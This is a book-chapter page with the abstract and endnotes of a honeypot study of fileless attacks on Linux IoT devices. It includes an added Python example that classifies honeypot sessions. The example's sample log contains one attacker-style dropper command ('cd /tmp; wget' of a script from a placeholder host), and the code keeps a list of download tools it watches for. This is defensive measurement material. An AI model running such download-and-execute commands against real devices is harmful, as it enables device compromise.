Abstract
With their wide adoption, Linux-based IoT devices have emerged as a primary target of today's cyber-attacks. Traditional malware-based attacks can spread quickly across these devices, but they are well-understood threats with effective defense techniques such as malware fingerprinting and community-based fingerprint sharing. Recently, fileless attacks (attacks that do not rely on malware files) have been increasing on Linux-based IoT devices and pose significant threats to the security and privacy of IoT systems. Little is known about their characteristics and attack vectors, which hinders research and development efforts to defend against them. In this chapter, we present our endeavor to understand fileless attacks on Linux-based IoT devices in the wild. Over a span of twelve months, we deploy 4 hardware IoT honeypots and 108 specially designed software IoT honeypots and successfully attract a wide variety of real-world IoT attacks. We present our measurement study of these attacks, with a focus on fileless attacks, including their prevalence, exploits, environments, and impacts. Our study further leads to multifold insights toward actionable defense strategies that can be adopted by IoT vendors and end users.
Notes
1. The remaining connections (i.e., 89.4% of the observed suspicious connections) could not intrude into our honeypots, since they failed to crack the honeypots' passwords.
2. Unlike previous studies on IoT attacks, in which fileless attacks were scarcely reported, our honeypots captured substantially more fileless attacks with diverse features. We also find that a root cause lies in the weak authentication of today's IoT devices, which makes it unprecedentedly easy for attackers to obtain remote control and then perform malicious actions without using malware.
3. For honeypots deployed in public clouds, the situation can differ slightly, since VM instances report diagnostic data (which is of course legitimate) to the cloud provider. Fortunately, such traffic is easily recognized, and we exclude it from our analysis.
4. A successful login is counted as an effective attack. If any file is downloaded (via wget), the attack is counted as malware-based. If no file is downloaded but any command is executed, it is counted as a fileless attack.
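The counting rule of note 4 (together with the failed-login case of note 1), worked as an added example that is not the chapter's or HoneyCloud's own code: a small Python classifier over constructed honeypot session logs in a hypothetical line format. It extends the rule slightly by treating curl and tftp like wget, and it separates out the edge case of a successful login after which no command is observed at all.

```python
import re
from collections import Counter, defaultdict

# Constructed sample log in a hypothetical honeypot format: one line per login attempt or command.
SAMPLE_LOG = """\
2023-03-01T10:00:01 session=s1 src=203.0.113.5 login=failed user=root
2023-03-01T10:05:00 session=s2 src=198.51.100.7 login=ok user=root
2023-03-01T10:05:02 session=s2 src=198.51.100.7 cmd=cd /tmp; wget http://example.invalid/x.sh
2023-03-01T10:09:00 session=s3 src=192.0.2.9 login=ok user=root
2023-03-01T10:09:01 session=s3 src=192.0.2.9 cmd=cat /proc/cpuinfo
2023-03-01T10:09:02 session=s3 src=192.0.2.9 cmd=uname -a
2023-03-01T10:12:00 session=s4 src=192.0.2.10 login=ok user=root
"""

LINE_RE = re.compile(r"session=(?P<sid>\S+) src=\S+ (?P<kind>login|cmd)=(?P<val>.*)$")
DOWNLOADERS = ("wget", "curl", "tftp")  # the chapter counts wget; curl/tftp are added here

def parse_sessions(log_text):
    """Group log lines by session id: did login succeed, and which commands ran."""
    sessions = defaultdict(lambda: {"login_ok": False, "cmds": []})
    for line in log_text.splitlines():
        m = LINE_RE.search(line)
        if not m:
            continue  # skip lines in an unexpected format
        sess = sessions[m["sid"]]
        if m["kind"] == "login":
            sess["login_ok"] |= m["val"].startswith("ok")
        else:
            sess["cmds"].append(m["val"])
    return dict(sessions)

def downloads_file(cmd):
    # Split chained/piped command lines so "cd /tmp; wget ..." is still caught.
    for part in re.split(r"[;&|]+", cmd):
        tokens = part.split()
        if tokens and tokens[0] in DOWNLOADERS:
            return True
    return False

def classify(sess):
    """Apply the chapter's counting rule to one session."""
    if not sess["login_ok"]:
        return "failed"          # credentials never cracked; not an effective attack
    if any(downloads_file(c) for c in sess["cmds"]):
        return "malware-based"   # a file was fetched
    if sess["cmds"]:
        return "fileless"        # commands executed, nothing downloaded
    return "login-only"          # effective login, but no command observed

def summarize(log_text):
    return dict(Counter(classify(s) for s in parse_sessions(log_text).values()))
```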
5. After we performed port scanning using nmap, Alibaba Cloud blocked our SSH connection from the same machine.
6. Broadcom and Atheros have made many MIPS SoCs for WiFi routers; Ingenic also provides various MIPS solutions.
7. There are a number of PowerPC-based set-top boxes and game consoles, such as the Wii and PlayStation.
8. SPARC-based SoCs, such as LEON, have been produced for years.
- 9.
10. Since the collected data were encrypted, we did not have direct, ideal evidence, but we noticed that the patterns matched well. Note that the SSH tunnel is used for forwarding data and does not involve shell interactions, so we cannot decrypt the data using the Shell Interceptor and Inference Terminal (Sect. 9.2.3.2).
Copyright information
© 2023 The Author(s), under exclusive license to Springer Nature Singapore Pte Ltd.
About this chapter
Cite this chapter
Li, Z., Dai, Y., Chen, G., Liu, Y. (2023). Understanding IoT Security with HoneyCloud. In: Content Distribution for Mobile Internet: A Cloud-based Approach. Springer, Singapore. https://doi.org/10.1007/978-981-19-6982-9_9
DOI: https://doi.org/10.1007/978-981-19-6982-9_9
Publisher Name: Springer, Singapore
Print ISBN: 978-981-19-6981-2
Online ISBN: 978-981-19-6982-9
eBook Packages: Computer Science (R0)